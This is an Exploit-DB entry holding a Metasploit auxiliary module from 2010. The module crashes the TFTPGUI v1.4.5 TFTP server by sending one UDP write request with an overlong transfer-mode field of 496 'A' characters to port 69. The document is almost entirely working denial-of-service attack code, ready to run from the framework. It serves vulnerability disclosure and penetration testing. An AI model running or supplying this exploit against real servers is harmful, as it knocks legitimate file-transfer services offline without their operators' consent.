# Title: TFTPGUI v1.4.5 Long Transport Mode Overflow
# EDB-ID: 12482
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Jeremiah Talamantes
# Published: 2010-05-02
# Verified: yes
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
#
# TFTPGUI v1.4.5 Long Transport Mode Overflow
#
# Tested on: Windows XP, SP2 (EN)
#
# Date tested: 5/2/2010
#
#
# |~Greetz to Devin @ infointox.net~|
#
# Discovered by: Jeremiah Talamantes
# RedTeam Security
# http://www.redteamsecure.com
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'TFTPGUI v1.4.5 Long Transport Mode Overflow',
'Description' => %q{
The TFTPUtil GUI server version 1.4.5 can be
DOSed by sending a specially crafted request. Discovered by
Jeremiah Talamantes at RedTeam Security.
Greetz to Devin @ infointox.net.
},
'Author' => 'Jeremiah Talamantes (RedTeam Security)',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'URL', 'http://www.redteamsecure.com/labs/post/37/redteam-discovers-0-day-in-tftpgui'],
[ 'URL', 'http://www.exploit-db.com/exploits/12482'],
[ 'URL', 'https://www.securityfocus.com/bid/39872'],
],
'DisclosureDate' => 'May 02 2010'))
register_options([Opt::RPORT(69)])
end
def run
connect_udp
print_status("Sending naughty request...")
$fn = "A"
$md = "A" * 496
$stuff = "\00\x02" + $fn + "\0" + $md + "\0"
udp_sock.put($stuff)
disconnect_udp
end
end